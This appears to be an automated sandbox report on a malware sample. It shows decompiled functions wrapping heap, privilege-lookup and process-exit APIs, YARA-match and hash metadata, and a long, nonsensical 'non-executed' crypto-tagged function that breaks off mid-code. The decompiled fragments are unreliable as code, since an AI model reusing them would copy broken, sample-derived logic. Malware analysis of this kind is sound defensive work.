                                    • Opcode ID: 0f60fa97fb3d56963100d84eada203fa8dc6652ea36c7835d3b5f98c0559632b
                                    • Instruction ID: e1019c8842211ffd19235361b37e0c11c7b7e48c7c909e1dca5ddd5bbbf9862d
                                    • Opcode Fuzzy Hash: 0f60fa97fb3d56963100d84eada203fa8dc6652ea36c7835d3b5f98c0559632b
                                    • Instruction Fuzzy Hash: B5E092B22043086BDA14EF99DC85EF773ADEF84760F15845AFA0C6B741C936A49087E5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041A070, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E0041A070(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t13;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041A960(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t13 = _a16;
				_t10 = RtlFreeHeap(_a8, _a12, _t13); // executed
				return _t10;
			}






                                    0x0041a07f
                                    0x0041a087
                                    0x0041a08c
                                    0x0041a09d
                                    0x0041a0a1

                                    APIs
                                    • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: FreeHeap
                                    • String ID:
                                    • API String ID: 3298025750-0
                                    • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                    • Instruction ID: ebe44f756a2289fd31ae4d5b5361048190c1dc89d00c79db85c43397b2838655
                                    • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                    • Instruction Fuzzy Hash: 81E01AB12102086BD714DF59CC45EA777ACEF88750F018559B90857241C630E9108AB0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041A030, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 30%
                                    			E0041A030(intOrPtr _a4, intOrPtr _a12, void* _a16) {
				void* _v3;
				intOrPtr _t8;
				void* _t9;
				void* _t10;
				void* _t13;

				_t6 = _a4;
				_t10 =  *(_a4 + 0x10);
				E0041A960(_t13, _t6, _t6 + 0xc70, _t10, 0, 0x34);
				_t8 = _a12;
				asm("adc [ebx-0x3b7cf3b3], cl");
				asm("adc al, 0x52");
				_push(_t8);
				_t9 = RtlAllocateHeap(_t10); // executed
				return _t9;
			}








                                    0x0041a033
                                    0x0041a036
                                    0x0041a047
                                    0x0041a04f
                                    0x0041a051
                                    0x0041a057
                                    0x0041a05b
                                    0x0041a05d
                                    0x0041a061

                                    APIs
                                    • RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A05D
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                    • Instruction ID: 0bf4e0d92ddb4de2ba6a166865ddf054dca1a4f918bcd24d9368b88a9b8aca1a
                                    • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                    • Instruction Fuzzy Hash: F1E012B1210208ABDB14EF99CC81EA777ACEF88664F158559BA086B242C630F9108AB0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041A1D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 30%
                                    			E0041A1D0(intOrPtr _a4, WCHAR* _a8, intOrPtr _a12, intOrPtr _a16) {
				int _t10;
				WCHAR* _t12;
				void* _t15;

				E0041A960(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t12 = _a8;
				_push(_a16);
				_push(_a12);
				_t10 = LookupPrivilegeValueW(_t12, ??, ??); // executed
				return _t10;
			}






                                    0x0041a1ea
                                    0x0041a1f5
                                    0x0041a1fb
                                    0x0041a1fe
                                    0x0041a200
                                    0x0041a204

                                    APIs
                                    • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: LookupPrivilegeValue
                                    • String ID:
                                    • API String ID: 3899507212-0
                                    • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                    • Instruction ID: 46e8f913edfca5d9b668009ee454d724baa27d6f5a7db77fbc9955010344b6d9
                                    • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                    • Instruction Fuzzy Hash: 22E01AB12002086BDB10DF49CC85EE737ADEF88650F018555BA0C67241C934E8508BF5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041A0B0, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E0041A0B0(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E0041A960(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                    0x0041a0b3
                                    0x0041a0ca
                                    0x0041a0d8

                                    APIs
                                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0D8
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID:
                                    • API String ID: 621844428-0
                                    • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                    • Instruction ID: eb2c75e7f7166c4cf28644cd9339eacac336c717648a3dafe3de7fd5e277bb7f
                                    • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                    • Instruction Fuzzy Hash: 4CD017726102187BD620EB99CC85FD777ACDF48BA0F0584A9BA5C6B242C531BA108AE1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041A0A4, Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A05D
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 85248d52c3e7c0f435eca41851e7ec4d7436493c1359fcec687c03d1fba2b5e7
                                    • Instruction ID: 4f0a0cd0ae30f9928f02bdfababf31d1a108c7731761cd3e0ec1af246c7f10f3
                                    • Opcode Fuzzy Hash: 85248d52c3e7c0f435eca41851e7ec4d7436493c1359fcec687c03d1fba2b5e7
                                    • Instruction Fuzzy Hash: 96C012771461902DE720EB717AB95EBBF18CA8516533C0A57ECCC4D90A801544598750
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00419FF6, Relevance: 1.5, APIs: 1, Instructions: 15memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A05D
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 3d2cf6a12404ca2f980804a543d2d355ab1ce788549bc2b5e5980809ba445573
                                    • Instruction ID: 1a4ea8256bda16cff5694d13eea4e9de58b7780db3995eca1f971b981f5dd047
                                    • Opcode Fuzzy Hash: 3d2cf6a12404ca2f980804a543d2d355ab1ce788549bc2b5e5980809ba445573
                                    • Instruction Fuzzy Hash: 8ED0C9B92001059B8B10DE49E8909A773A9AFC82147508546FC5883301C635D8208AB2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Non-executed Functions

                                    Function 006A6507, Relevance: 1.7, Instructions: 1715COMMONCrypto
                                    Download Yara Rule
                                    C-Code - Quality: 72%
                                    			E006A6507(signed int __eax, void* __ebx, signed int __ecx, signed int __edx, signed int* __edi, signed int __esi, void* __fp0) {
				signed char _t266;
				signed char _t267;
				signed char _t268;
				signed char _t270;
				signed char _t271;
				signed char _t272;
				signed char _t273;
				signed char _t274;
				signed char _t276;
				signed char _t277;
				signed int _t278;
				signed char _t279;
				signed char _t281;
				signed char _t282;
				signed int _t283;
				signed char _t285;
				signed int _t286;
				signed char _t288;
				signed char _t289;
				signed char _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				intOrPtr* _t296;
				signed char _t298;
				signed char _t299;
				signed char _t300;
				signed char _t301;
				signed int _t302;
				signed int _t303;
				signed char _t305;
				signed char _t307;
				signed char _t308;
				signed char _t310;
				signed int* _t312;
				signed char _t313;
				signed char _t314;
				intOrPtr* _t316;
				signed char _t318;
				signed char _t319;
				signed char _t321;
				signed char _t323;
				signed char _t324;
				signed char _t326;
				signed char _t327;
				signed char _t329;
				signed char _t330;
				signed char _t331;
				intOrPtr* _t334;
				signed char _t335;
				signed char _t337;
				signed char _t339;
				signed char _t340;
				intOrPtr* _t343;
				signed char _t344;
				signed char _t345;
				intOrPtr* _t348;
				signed char _t349;
				intOrPtr* _t352;
				intOrPtr* _t355;
				signed char _t356;
				intOrPtr* _t359;
				signed char _t360;
				intOrPtr* _t363;
				signed char _t366;
				signed char _t367;
				signed char _t368;
				signed char _t369;
				signed char _t370;
				signed char _t371;
				intOrPtr* _t372;
				void* _t373;
				signed char _t375;
				signed char _t376;
				signed char _t377;
				signed char _t378;
				signed char _t382;
				signed char _t383;
				signed int _t384;
				signed char _t386;
				signed char _t387;
				signed char _t388;
				intOrPtr* _t389;
				intOrPtr* _t391;
				signed char _t393;
				signed char _t394;
				intOrPtr* _t395;
				signed int _t396;
				signed int _t397;
				signed char _t398;
				signed int _t399;
				signed char _t401;
				signed char _t402;
				signed char _t404;
				signed char _t405;
				signed char _t407;
				signed int _t408;
				signed char _t410;
				signed char _t411;
				signed char _t412;
				signed int _t414;
				signed char _t415;
				signed char _t419;
				signed char _t421;
				signed int _t423;
				signed char _t424;
				signed int _t425;
				signed char _t427;
				signed char _t428;
				signed char _t429;
				signed int _t431;
				signed char _t432;
				signed char _t436;
				signed char _t438;
				signed char _t440;
				signed int _t441;
				signed int _t443;
				signed char _t444;
				signed int _t447;
				signed char _t448;
				signed char _t450;
				signed int _t452;
				signed char _t453;
				signed char _t454;
				signed char _t456;
				signed char _t457;
				signed char _t458;
				signed char _t460;
				signed char _t461;
				signed char _t463;
				signed char _t464;
				signed char _t466;
				signed char _t467;
				signed char _t469;
				signed char _t470;
				signed char _t471;
				signed char _t473;
				signed char _t477;
				signed char _t480;
				signed char _t481;
				signed int _t482;
				signed char _t484;
				signed char _t488;
				signed char _t490;
				signed char _t491;
				signed char _t492;
				signed char _t493;
				signed char _t495;
				signed char _t496;
				signed char _t497;
				signed char _t498;
				signed int _t499;
				void* _t501;
				signed char _t502;
				signed char _t503;
				signed char _t504;
				signed char _t505;
				signed char _t510;
				void* _t511;
				void* _t516;
				signed char _t518;
				signed int* _t519;
				signed char _t520;
				signed char _t521;
				signed char _t522;
				signed char _t523;
				signed char _t526;
				signed char _t527;
				signed char _t528;
				signed char _t529;
				signed char _t531;
				signed char _t532;
				signed char _t533;
				signed char _t534;
				signed char _t535;
				signed char _t536;
				signed char _t537;
				signed char _t538;
				signed char _t540;
				signed char _t541;
				void* _t544;
				signed char _t546;
				signed char _t547;
				intOrPtr* _t548;
				void* _t549;
				signed char _t550;
				void* _t554;
				void* _t556;
				signed char _t558;
				signed char _t561;
				signed char _t564;
				signed char _t565;
				signed char _t566;
				signed char _t567;
				signed char _t568;
				signed char _t569;
				void* _t572;
				signed char _t574;
				void* _t577;
				void* _t582;
				void* _t583;
				void* _t584;
				signed char _t586;
				signed char _t587;
				signed char _t593;
				void* _t595;
				signed char _t597;
				signed char _t598;
				signed char _t604;
				void* _t606;
				signed char _t608;
				signed char _t609;
				signed char _t611;
				signed char _t615;
				signed char _t618;
				void* _t628;
				void* _t632;
				signed char _t638;
				signed char _t639;
				signed char _t640;
				signed char _t641;
				signed char _t642;
				signed char _t643;
				signed char _t644;
				signed char _t645;
				signed char _t646;
				signed char _t647;
				signed char _t648;
				void* _t649;
				signed char _t650;
				signed char _t651;
				signed char _t652;
				signed char _t654;
				void* _t655;
				signed int _t656;
				signed char _t658;
				intOrPtr* _t659;
				signed char _t660;
				signed char _t662;
				signed char _t663;
				signed int* _t664;
				signed char _t665;
				signed char _t667;
				signed char _t668;
				signed int _t669;
				intOrPtr* _t670;
				intOrPtr* _t671;
				signed char _t675;
				signed char _t676;
				signed char _t677;
				signed char _t679;
				void* _t680;
				void* _t681;
				signed char _t683;
				signed char _t684;
				signed char _t685;
				signed char _t686;
				signed int* _t688;
				signed int* _t690;
				signed int* _t694;
				void* _t695;
				void* _t696;
				signed int _t698;
				signed int* _t699;
				signed int _t700;
				signed int _t703;
				signed int* _t704;
				signed int _t705;
				void* _t706;
				signed int _t707;
				void* _t708;
				void* _t709;
				void* _t710;
				void* _t711;
				void* _t712;
				void* _t713;
				void* _t715;
				void* _t747;
				void* _t767;
				void* _t795;
				void* _t839;

				_t839 = __fp0;
				_t698 = __esi;
				_t694 = __edi;
				_push(__edi);
				 *__eax =  *__eax + __eax;
				_t638 = __edx | __edi[0x448a07];
				 *__eax =  *__eax + __eax;
				_t266 = __eax |  *_t638;
				 *_t266 =  *_t266 + _t266;
				 *((intOrPtr*)(__ecx + 0x58)) =  *((intOrPtr*)(__ecx + 0x58)) + _t266;
				asm("insb");
				 *__edi =  *__edi - _t638;
				 *_t638 =  *_t638 + __ecx;
				 *_t266 =  *_t266 + _t705;
				asm("int3");
				 *_t266 =  *_t266 + _t266;
				_t267 = _t266 |  *_t638;
				 *_t267 =  *_t267 + _t267;
				 *((intOrPtr*)(_t267 + 0x58)) =  *((intOrPtr*)(_t267 + 0x58)) + _t267;
				asm("insb");
				 *__edi =  *__edi - _t638;
				 *_t638 =  *_t638 + __ecx;
				_t477 = 0x73;
				 *_t267 =  *_t267 + _t267;
				_t510 = __ecx |  *_t267;
				asm("arpl [eax], ax");
				 *_t638 =  *_t638 + _t510;
				if( *_t638 < 0) {
					 *_t267 =  *_t267 + _t267;
					_t467 = _t267 |  *0x656f17;
					 *_t638 =  *_t638 + _t510;
					 *0x666f17 =  *0x666f17 + _t467;
					 *_t638 =  *_t638 + _t510;
					__edi[0x19] = __edi[0x19] + _t510;
					 *_t467 =  *_t467 + _t467;
					_t469 = (_t467 |  *_t467) + 0x6f;
					_pop(_t632);
					 *_t469 =  *_t469 + _t469;
					_t470 = _t469 |  *_t469;
					 *_t470 = es;
					 *_t470 =  *_t470 + _t470;
					 *((intOrPtr*)(_t705 + 0x280a0000)) =  *((intOrPtr*)(_t705 + 0x280a0000)) - 0x73;
					 *_t470 = 0;
					 *_t470 =  *_t470 + _t470;
					 *_t470 =  *_t470;
					ds = es;
					asm("salc");
					_pop(_t638);
					 *_t470 =  *_t470 + _t470;
					_t471 = _t470 |  *_t638;
					 *0x73 =  *0x73 - 0x73;
					 *_t638 =  *_t638 + _t632 +  *_t470 +  *_t470;
					 *_t471 =  *_t471;
					ds = es;
					 *_t471 =  *_t471 + _t471;
					 *_t471 =  *_t471 + _t471;
					_t473 = (_t471 |  *_t471) + 0x6f;
					_t510 = 0x5c73dad6;
					 *_t473 =  *_t473 + _t473;
					_t267 = _t473 |  *_t638;
				}
				_t511 = _t510 +  *_t267;
				_t268 =  *_t267;
				 *_t698 =  *_t698 + _t268;
				if( *_t698 < 0) {
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268;
					ds = es;
					asm("adc al, 0xd6");
					_pop(_t688);
					 *_t268 =  *_t268 + _t268;
					asm("adc dh, [ebx+0x5c]");
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					_t463 = (_t268 |  *_t268) + 0x6f;
					_pop(_t628);
					 *_t463 =  *_t463 + _t463;
					_t464 = _t463 |  *_t688;
					 *((intOrPtr*)(_t698 + 0x73060000)) =  *((intOrPtr*)(_t698 + 0x73060000)) - _t628;
					_pop(_t698);
					 *_t464 =  *_t464 + _t464;
					 *_t464 =  *_t464;
					ds = es;
					asm("salc");
					_pop(_t690);
					 *_t464 =  *_t464 + _t464;
					_t477 = _t477 |  *_t694 |  *((_t477 |  *_t694) + _t698 * 2);
					 *_t464 =  *_t464 + _t464;
					 *_t464 =  *_t464 + _t464;
					_t466 = (_t464 |  *_t464) + 0x6f;
					_pop(_t511);
					 *_t466 =  *_t466 + _t466;
					_t268 = _t466 |  *_t690;
					 *((intOrPtr*)(_t268 + _t268 + 0x5e730600)) =  *((intOrPtr*)(_t268 + _t268 + 0x5e730600)) - _t511;
					 *_t268 =  *_t268 + _t268;
				}
				 *_t268 =  *_t268;
				ds = es;
				asm("sbb dl, dh");
				_t639 = ss;
				 *_t268 =  *_t268 + _t268;
				_push(ds);
				if((_t477 |  *_t694) < 0) {
					 *_t268 =  *_t268 + _t268;
					 *_t268 =  *_t268 + _t268;
					_t456 = (_t268 |  *_t268) + 0x6f;
					 *_t456 =  *_t456 + _t456;
					_t457 = _t456 |  *_t639;
					 *((intOrPtr*)(_t457 + 0x73060000)) =  *((intOrPtr*)(_t457 + 0x73060000)) - _t639;
					_pop(_t698);
					 *_t457 =  *_t457 + _t457;
					_t684 = _t639 |  *_t698;
					 *_t457 =  *_t457 + _t457;
					_t458 = _t457 |  *_t684;
					 *((intOrPtr*)(_t684 - 0x25fa0000)) =  *((intOrPtr*)(_t684 - 0x25fa0000)) - _t458;
					_pop(ds);
					asm("adc al, 0xd6");
					_pop(_t685);
					 *_t458 =  *_t458 + _t458;
					asm("adc dh, [ebx+0x5c]");
					 *_t458 =  *_t458 + _t458;
					 *_t458 =  *_t458 + _t458;
					_t460 = (_t458 |  *_t458) + 0x6f;
					 *_t460 =  *_t460 + _t460;
					_t461 = _t460 |  *_t685;
					 *((intOrPtr*)(_t461 + _t461 + 0x5e730600)) =  *((intOrPtr*)(_t461 + _t461 + 0x5e730600)) - _t685;
					 *_t461 =  *_t461 + _t461;
					_t686 = _t685 |  *_t698;
					 *_t461 =  *_t461 + _t461;
					_t268 = _t461 |  *_t686;
					 *((intOrPtr*)(_t686 - 0x25fa0000)) =  *((intOrPtr*)(_t686 - 0x25fa0000)) - _t268;
				}
				asm("ficomp dword [edi]");
				asm("salc");
				_pop(_t640);
				 *_t268 =  *_t268 + _t268;
				_pop(_t715);
				 *_t268 =  *_t268 + _t268;
				 *_t268 =  *_t268 + _t268;
				_t270 = (_t268 |  *_t268) + 0x6f;
				_pop(_t516);
				 *_t270 =  *_t270 + _t270;
				while(1) {
					_t271 = _t270 |  *_t640;
					 *((intOrPtr*)(_t640 + 0x73060000)) =  *((intOrPtr*)(_t640 + 0x73060000)) - _t640;
					_pop(_t699);
					 *_t271 =  *_t271 + _t271;
					_t641 = _t640 |  *_t699;
					_pop(_t480);
					 *_t271 =  *_t271 + _t271;
					_t272 = _t271 |  *_t641;
					 *((intOrPtr*)(_t641 - 0x25fa0000)) =  *((intOrPtr*)(_t641 - 0x25fa0000)) - _t272;
					_pop(ds);
					asm("sbb dl, dh");
					_t518 = _t516 +  *_t271 +  *_t272;
					_pop(_t642);
					 *_t272 =  *_t272 + _t272;
					_t481 = _t480 |  *_t694;
					_push(ds);
					if(_t481 >= 0) {
						break;
					}
					 *_t272 =  *_t272 + _t272;
					_t618 = _t518 | _t694[0x18];
					 *_t272 =  *_t272 + _t272;
					_t452 = _t272 |  *_t272;
					asm("sbb al, 0x8d");
					 *_t618 =  *_t618 + _t452;
					_t453 = _t452 & 0x5a280216;
					 *_t453 =  *_t453 + _t453;
					_t505 = _t481 |  *_t694;
					 *_t453 =  *_t453 + _t453;
					_t454 = _t453 |  *( &(_t694[0x9404000]) + (_t642 |  *(_t505 - 0x70)));
					_pop(ss);
					_t516 = _t618 +  *_t454;
					_pop(_t683);
					 *_t454 =  *_t454 + _t454;
					_t481 = _t505 |  *_t694;
					_t704 =  &(_t699[0]);
					asm("ficomp dword [edi]");
					_t640 = _t683 |  *(_t481 - 0x70);
					 *_t454 =  *_t454 + _t454;
					_t270 = _t454 |  *( &(_t694[0x9404000]) + _t640);
					asm("sbb [edx], al");
					 *_t640 =  *_t640 - _t481;
					 *_t640 =  *_t640 + _t516;
					_pop(ds);
					_t715 = _t715 - 1;
					asm("ficomp dword [edi]");
					_push(ss);
					if( *_t640 >= 0) {
						continue;
					} else {
						 *_t270 =  *_t270 + _t270;
						_t272 = _t270 |  *( &(_t694[0x9404000]) + _t640);
						asm("sbb [edx], eax");
						 *_t640 =  *_t640 - _t481;
						 *_t640 =  *_t640 + _t516;
						_pop(ds);
						_t699 =  &(_t704[0]);
						asm("ficomp dword [edi]");
					}
					break;
				}
				_pop(ds);
				_t643 = _t642 &  *(_t481 - 0x70);
				 *_t272 =  *_t272 + _t272;
				_t273 = _t272 |  *( &(_t694[0x9404000]) + _t643);
				asm("sbb al, [edx]");
				 *_t643 =  *_t643 - _t481;
				 *_t643 =  *_t643 + _t518;
				_pop(ds);
				_t644 = _t643 &  *(_t481 - 0x70);
				 *_t273 =  *_t273 + _t273;
				_t274 = _t273 |  *( &(_t694[0x9404000]) + _t644);
				asm("sbb eax, [edx]");
				 *_t644 =  *_t644 - _t481;
				 *_t644 =  *_t644 + _t518;
				_pop(ds);
				_t645 = _t644 |  *(_t481 - 0x70);
				 *_t274 =  *_t274 + _t274;
				_t276 = (_t274 |  *( &(_t694[0x4c04000]) + _t645)) + 4;
				asm("outsd");
				_pop(_t519);
				 *_t276 =  *_t276 + _t276;
				_t277 = _t276 |  *_t645;
				_t699[0x1cc18000] = _t699[0x1cc18000] - _t645;
				_pop(_t700);
				 *_t277 =  *_t277 + _t277;
				_t646 = _t645 |  *_t519;
				_t278 = _t277 + 0x6f;
				asm("les eax, [eax]");
				 *_t646 =  *_t646 + _t519;
				 *_t646 =  *_t646 + _t278;
				 *((intOrPtr*)(_t700 + 0x16060000)) =  *((intOrPtr*)(_t700 + 0x16060000)) - _t481;
				 *_t519 =  *_t519 + 1;
				asm("adc ecx, [ebx]");
				asm("adc [ebx], ecx");
				_pop(_t520);
				 *_t278 =  *_t278 + _t278;
				_t521 = _t520 |  *_t278;
				asm("int 0x0");
				 *_t646 =  *_t646 + _t521;
				_t522 = _t521 +  *_t278;
				_pop(_t647);
				 *_t278 =  *_t278 + _t278;
				_t482 = _t481 |  *_t694;
				asm("adc al, 0xda");
				_pop(ds);
				_t279 = _t278 | 0x101f101f;
				if(_t279 >= 0) {
					L15:
					asm("adc [ebx+0x5c], dh");
					 *_t279 =  *_t279 + _t279;
					goto L16;
				} else {
					 *_t279 =  *_t279 + _t279;
					 *_t279 =  *_t279 + _t279;
					_t447 = (_t279 |  *_t279) + 0x6f;
					_pop(_t615);
					 *_t447 =  *_t447 + _t447;
					_t448 = _t482;
					_t482 = _t447;
					 *_t448 =  *_t448 + _t448;
					 *_t647 =  *_t647 - _t482;
					 *_t647 =  *_t647 + (_t615 |  *_t447);
					_pop(ds);
					asm("adc al, 0xda");
					_pop(ds);
					_t450 = _t448 |  *_t647 | 0x0000001f;
					asm("adc [edi], bl");
					asm("adc [ebx+0x5c], dh");
					 *_t450 =  *_t450 + _t450;
					 *_t450 =  *_t450 + _t450;
					_t281 = (_t450 |  *_t450) + 0x6f;
					_pop(_t522);
					 *_t281 =  *_t281 + _t281;
					_t648 = _t647 |  *(_t647 - 7);
					 *_t281 =  *_t281 + _t281;
					if( *_t281 < 0) {
						L20:
						_t443 = (_t281 |  *_t281) + 0x6f;
						_pop(_t611);
						 *_t443 =  *_t443 + _t443;
						_t444 = _t482;
						_t482 = _t443;
						 *_t444 =  *_t444 + _t444;
						 *_t648 =  *_t648 - _t482;
						 *_t648 =  *_t648 + (_t611 |  *_t443);
						_pop(ds);
						asm("adc al, 0xda");
						_pop(ds);
						_t279 = _t444 |  *_t648 | 0x0000001f;
						asm("adc [edi], bl");
						asm("adc [ebx+0x5c], dh");
						 *_t279 =  *_t279 + _t279;
						goto L21;
					} else {
						_t705 = _t705 - 1;
						 *_t281 =  *_t281 + _t281;
						if( *_t281 < 0) {
							L16:
							_t523 = _t522 |  *_t279;
							asm("arpl [eax], ax");
							 *_t647 =  *_t647 + _t523;
							if( *_t647 >= 0) {
								L21:
								asm("outsd");
								asm("movsb");
								 *_t279 =  *_t279 + _t279;
								_t281 = (_t279 |  *_t279) + 0x6f;
								_pop(_t524);
								 *_t281 =  *_t281 + _t281;
								_t648 = _t647 |  *(_t647 - 7);
								 *_t281 =  *_t281 + _t281;
								if( *_t281 < 0) {
									goto L30;
								} else {
									_t705 = _t705 - 1;
									 *_t281 =  *_t281 + _t281;
									if( *_t281 < 0) {
										goto L26;
									} else {
										 *_t281 =  *_t281 + _t281;
										_t81 = _t524 + 0x17;
										 *_t81 =  *(_t524 + 0x17) & _t281;
										if( *_t81 >= 0) {
											goto L28;
										} else {
											 *_t281 =  *_t281 + _t281;
											_t524 = _t524 |  *_t281;
											asm("into");
											 *_t281 =  *_t281 + _t281;
											_t281 = _t281 |  *_t648;
											 *_t648 =  *_t648 - _t482;
											 *_t648 =  *_t648 + _t524;
											_pop(ds);
											asm("adc al, 0xda");
											_pop(ds);
											_t482 = _t482 |  *_t694;
											asm("adc [edi], bl");
											goto L25;
										}
									}
								}
							} else {
								 *_t279 =  *_t279 + _t279;
								_t440 = _t279 |  *0x656f17;
								 *_t647 =  *_t647 + _t523;
								 *0x666f17 =  *0x666f17 + _t440;
								 *_t647 =  *_t647 + _t523;
								_t694[0x19] = _t694[0x19] + _t523;
								 *_t440 =  *_t440 + _t440;
								_t441 = _t440 |  *_t440;
								 *_t441 =  *_t441 + _t482;
								asm("rol dword [eax], 1");
								 *_t441 =  *_t441 + _t441;
								 *((intOrPtr*)(_t694 + _t705 * 2)) =  *((intOrPtr*)(_t694 + _t705 * 2)) + _t441;
								_pop(_t608);
								 *_t441 =  *_t441 + _t441;
								_t609 = _t608 |  *_t441;
								asm("int 0x0");
								 *_t647 =  *_t647 + _t609;
								_t524 = _t609 +  *_t441;
								_pop(_t648);
								 *_t441 =  *_t441 + _t441;
								_t482 = _t482 |  *_t694;
								asm("adc al, 0xda");
								_pop(ds);
								_t281 = _t441 | 0x101f101f;
								if(_t281 >= 0) {
									L25:
									asm("adc [ebx+0x5c], dh");
									 *_t281 =  *_t281 + _t281;
									L26:
									_t527 = _t524 |  *_t281;
									asm("arpl [eax], ax");
									 *_t648 =  *_t648 + _t527;
									_t747 =  *_t648;
									if(_t747 >= 0) {
										L31:
										asm("int 0x0");
										 *_t648 =  *_t648 + _t527;
										_t528 = _t527 +  *_t281;
										_pop(_t649);
										 *_t281 =  *_t281 + _t281;
										_t482 = _t482 |  *_t694;
										_t650 = _t649 - _t482;
										_pop(ds);
										_t283 = _t281 | 0x101f101f;
										if(_t283 >= 0) {
											goto L37;
										} else {
											 *_t283 =  *_t283 + _t283;
											 *_t283 =  *_t283 + _t283;
											_t431 = (_t283 |  *_t283) + 0x6f;
											_pop(_t604);
											 *_t431 =  *_t431 + _t431;
											_t524 = _t604 |  *_t431;
											_t432 = _t482;
											_t482 = _t431;
											 *_t432 =  *_t432 + _t432;
											 *_t650 =  *_t650 - _t482;
											 *_t650 =  *_t650 + (_t604 |  *_t431);
											_pop(ds);
											_t648 = _t650 - _t482;
											_pop(ds);
											_t281 = _t432 |  *_t650 | 0x0000001f;
											asm("adc [edi], bl");
											asm("adc [ebx+0x5c], dh");
											goto L33;
										}
									} else {
										 *_t281 =  *_t281 + _t281;
										_t436 = _t281 |  *0x656f17;
										 *_t648 =  *_t648 + _t527;
										 *0x666f17 =  *0x666f17 + _t436;
										 *_t648 =  *_t648 + _t527;
										_t694[0x19] = _t694[0x19] + _t527;
										 *_t436 =  *_t436 + _t436;
										_t438 = (_t436 |  *_t436) + 0x6f;
										_pop(_t606);
										 *_t438 =  *_t438 + _t438;
										_t482 = _t482 |  *_t694;
										 *_t438 =  *_t438 + _t438;
										_t524 = _t606 - _t438 |  *_t438;
										 *_t438 = 0;
										_t648 = _t648 |  *(_t482 + 0x5e);
										 *_t438 =  *_t438 + _t438;
										 *_t648 =  *_t648 - _t482;
										 *_t648 =  *_t648 + _t524;
										ds = _t438;
										asm("adc al, 0xda");
										_pop(ds);
										_t281 = _t438 |  *_t648 | 0x0000001f;
										asm("adc [edi], bl");
										asm("adc [ebx+0x5c], esi");
										L28:
										if(_t747 >= 0) {
											L33:
